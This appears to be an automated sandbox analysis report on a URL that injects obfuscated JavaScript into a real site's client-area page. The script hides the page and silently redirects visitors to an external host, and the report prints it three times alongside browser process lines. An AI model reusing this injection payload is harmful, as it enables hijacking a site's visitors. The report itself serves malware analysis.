Analysis
max time kernel: 128s
max time network: 140s
platform: windows10-2004_x64
resource: win10v2004-20240611-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
submitted: 13-06-2024 07:34
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample
https://www.key-data.co.uk/clientarea/questionview.php?c%0100520000639%22%3E%3C%2Fp%3E%3CsCRIpt>b%20%3Datob%3B%0Ameth%20%3D%20%22re%22%2B%22pla%22%2B%22ce%22%3B%0Amorakchi%3D%28el%29%20%3D%3E%20el%5Bmeth%5D%28%20%2F%23%2Fgi%2C%20%27%27%20%29%5Bmeth%5D%28%2F%5C%21%2Fgi%2C%20%27%27%20%29%3B%0Amolga%3Db%28%22ZG9jdW1lbnQ%22%29%3B%0Amolga%3D%20this%5Bmolga%5D%3B%0Amolga%5Bmorakchi%28%27ti%23%27%2B%27t%21l%23%23e%27%29%5D%3D%27%2E%2E%2E%27%3Bmolga%5Bmorakchi%28%27b%21%23od%27%2B%27%21y%23%27%29%5D%2Estyle%5Bmorakchi%28%27op%23a%21%27%2B%27c%21it%27%2B%27%23y%23%27%29%5D%3D0x0%3B%0Athis%5Bmorakchi%28%60o%21p%60%2B%60e%21%60%2B%60%21n%23%60%29%5D%28morakchi%28%60h%21tt%21p%60%2B%60s%21%3A%2F%2Fi%23%21m%21p%60%2B%60u%21t%60%2B%60%21el%60%2B%60et%23t%60%2B%60er%60%2B%60%2Ec%60%2B%60o%60%2B%60m%23%2F0%2F0%60%2B%60%2F0%2Fu%60%2B%608%214%60%2B%60c%216%60%2B%605%60%2B%6030%60%2B%604%211%238%60%2B%60a%21a%232%212%60%2B%60e3%60%2B%608b%21fb%60%2B%60%21da%2148%60%2B%6047%21%23c%210%237%231%217%21f%2F13/272-11881/1195-23416-14403%60%29%2Cmorakchi%28%60%23_s%21e%23l%21%23f%21%60%29%29%3B%0A%3C%2FsCRIpt%3E
Resource
win10v2004-20240611-en
General
Target
https://www.key-data.co.uk/clientarea/questionview.php?c%0100520000639%22%3E%3C%2Fp%3E%3CsCRIpt>b%20%3Datob%3B%0Ameth%20%3D%20%22re%22%2B%22pla%22%2B%22ce%22%3B%0Amorakchi%3D%28el%29%20%3D%3E%20el%5Bmeth%5D%28%20%2F%23%2Fgi%2C%20%27%27%20%29%5Bmeth%5D%28%2F%5C%21%2Fgi%2C%20%27%27%20%29%3B%0Amolga%3Db%28%22ZG9jdW1lbnQ%22%29%3B%0Amolga%3D%20this%5Bmolga%5D%3B%0Amolga%5Bmorakchi%28%27ti%23%27%2B%27t%21l%23%23e%27%29%5D%3D%27%2E%2E%2E%27%3Bmolga%5Bmorakchi%28%27b%21%23od%27%2B%27%21y%23%27%29%5D%2Estyle%5Bmorakchi%28%27op%23a%21%27%2B%27c%21it%27%2B%27%23y%23%27%29%5D%3D0x0%3B%0Athis%5Bmorakchi%28%60o%21p%60%2B%60e%21%60%2B%60%21n%23%60%29%5D%28morakchi%28%60h%21tt%21p%60%2B%60s%21%3A%2F%2Fi%23%21m%21p%60%2B%60u%21t%60%2B%60%21el%60%2B%60et%23t%60%2B%60er%60%2B%60%2Ec%60%2B%60o%60%2B%60m%23%2F0%2F0%60%2B%60%2F0%2Fu%60%2B%608%214%60%2B%60c%216%60%2B%605%60%2B%6030%60%2B%604%211%238%60%2B%60a%21a%232%212%60%2B%60e3%60%2B%608b%21fb%60%2B%60%21da%2148%60%2B%6047%21%23c%210%237%231%217%21f%2F13/272-11881/1195-23416-14403%60%29%2Cmorakchi%28%60%23_s%21e%23l%21%23f%21%60%29%29%3B%0A%3C%2FsCRIpt%3E
Malware Config
Signatures
Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1960)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.key-data.co.uk/clientarea/questionview.php?c%0100520000639%22%3E%3C%2Fp%3E%3CsCRIpt>b%20%3Datob%3B%0Ameth%20%3D%20%22re%22%2B%22pla%22%2B%22ce%22%3B%0Amorakchi%3D%28el%29%20%3D%3E%20el%5Bmeth%5D%28%20%2F%23%2Fgi%2C%20%27%27%20%29%5Bmeth%5D%28%2F%5C%21%2Fgi%2C%20%27%27%20%29%3B%0Amolga%3Db%28%22ZG9jdW1lbnQ%22%29%3B%0Amolga%3D%20this%5Bmolga%5D%3B%0Amolga%5Bmorakchi%28%27ti%23%27%2B%27t%21l%23%23e%27%29%5D%3D%27%2E%2E%2E%27%3Bmolga%5Bmorakchi%28%27b%21%23od%27%2B%27%21y%23%27%29%5D%2Estyle%5Bmorakchi%28%27op%23a%21%27%2B%27c%21it%27%2B%27%23y%23%27%29%5D%3D0x0%3B%0Athis%5Bmorakchi%28%60o%21p%60%2B%60e%21%60%2B%60%21n%23%60%29%5D%28morakchi%28%60h%21tt%21p%60%2B%60s%21%3A%2F%2Fi%23%21m%21p%60%2B%60u%21t%60%2B%60%21el%60%2B%60et%23t%60%2B%60er%60%2B%60%2Ec%60%2B%60o%60%2B%60m%23%2F0%2F0%60%2B%60%2F0%2Fu%60%2B%608%214%60%2B%60c%216%60%2B%605%60%2B%6030%60%2B%604%211%238%60%2B%60a%21a%232%212%60%2B%60e3%60%2B%608b%21fb%60%2B%60%21da%2148%60%2B%6047%21%23c%210%237%231%217%21f%2F13/272-11881/1195-23416-14403%60%29%2Cmorakchi%28%60%23_s%21e%23l%21%23f%21%60%29%29%3B%0A%3C%2FsCRIpt%3E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1372)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4376,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=3896 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4872)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=3824,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=4936 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4784)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5328,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5384 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4396)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5336,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5420 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3852)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=1308,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5852 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1668)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=5544,i,16856304285138459032,14480077487839828721,262144 --variations-seed-version --mojo-platform-channel-handle=5540 /prefetch:8